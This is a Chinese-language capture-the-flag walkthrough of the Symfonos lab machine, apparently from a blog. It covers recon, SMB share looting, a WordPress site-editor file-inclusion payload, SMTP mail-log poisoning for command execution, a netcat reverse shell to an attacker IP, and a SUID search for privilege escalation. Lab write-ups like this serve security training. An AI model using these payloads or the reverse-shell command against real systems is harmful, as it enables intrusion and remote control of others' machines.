Symfonos靶场打靶记录

简介: Symfonos靶场打靶记录

0x01 信息收集阶段

1.arp-scan -l 扫描主机【IP以实际IP为准】

2.nmap扫描端口,发现smtp,http,samba服务开放

登录web

3.-L:显示服务器端所分享出来的所有资源;发现共享文件helios和anonymous

0x02 渗透测试阶段

4.指定anonymous用户以guest身份登录

ls发现存在attention.txt文件,get下载文件 查看attention.txt发现三个疑似密码epliioko qwerty baseball

5.指定helios用户登录

发现存在research.txt和todo.txt文件,下载到本地

6.查看todo.txt,发现疑似url路径

7.尝试登录url路径

修改/etc/hosts文件,添加一行解析


发现可以正常访问

8.wpscan工具扫描

因为工具需要联网,场景中不能使用。直接给出结果,扫描到存在site-editor插件,版本1.1.1


wpscan --url http://symfonos.local/h3l105/ --enumeratep,t,tt,cb,dbe,u,m

9、site-editor存在文件包含漏洞,输入payload


http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

10.通过telnet连接smtp25端口,发送php文件。

11.测试是否发送成功


http://<host>/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?=/var/mail/helios&c=id

12.反弹shell


&c=nc -e /bin/bash 10.10.210.199 7777

13.攻击机监听获得shell

0x02 提权阶段

14.查找suid文件


find / -perm -u=s 2>/dev/null

15.提权

16.寻找flag文件

目录
相关文章
|
8月前
|
存储 安全 Linux
CTFHuB靶场命令执行题型过关总结
本篇博文是对自己学习rce漏洞后,因为没有进行实战练习,仅仅停留在概念上,因此做了一次靶场实战练习,来帮助自己熟悉rce漏洞的利用类型以及利用方法,写下这篇文章对此做个总结..其实关于这个练习已经过去了很久了,但我还是要那出来进行一次复习吧,对与命令执行相关的一些操作,对自己在漏洞挖掘方面能有更多的帮助,通过这次练习也对自己关于代码审计或是关于linux命令的常见命令的同意替换有了更多的了解.
130 2
|
移动开发 JavaScript 安全
记录一次社会工程学工具Seeker+ngrok
今天偶然刷bi站,刷到seeker结合ngrok进行社会工程学钓鱼的教程,下面话不多说,直接开始!
pikachu靶场通关秘籍之跨站请求伪造攻击
pikachu靶场通关秘籍之跨站请求伪造攻击
140 0
pikachu靶场通关秘籍之跨站请求伪造攻击
|
SQL 安全 数据库
记一次稍微有点曲折的getshell
记一次稍微有点曲折的getshell
pikachu靶场通关秘籍之敏感信息泄露攻击
pikachu靶场通关秘籍之敏感信息泄露攻击
234 0
|
安全 中间件 关系型数据库
vulntarget-i 打靶记录(上)
vulntarget-i 打靶记录
155 0
|
存储 安全 Shell
vulntarget-i 打靶记录(下)
vulntarget-i 打靶记录
143 0
|
SQL 安全 Shell
vulntarget-h 打靶记录
vulntarget-h 打靶记录
240 0
pikachu靶场通关秘籍之目录遍历攻击
pikachu靶场通关秘籍之目录遍历攻击
198 0
|
JavaScript
pikachu靶场通关秘籍之跨站脚本攻击
pikachu靶场通关秘籍之跨站脚本攻击
151 0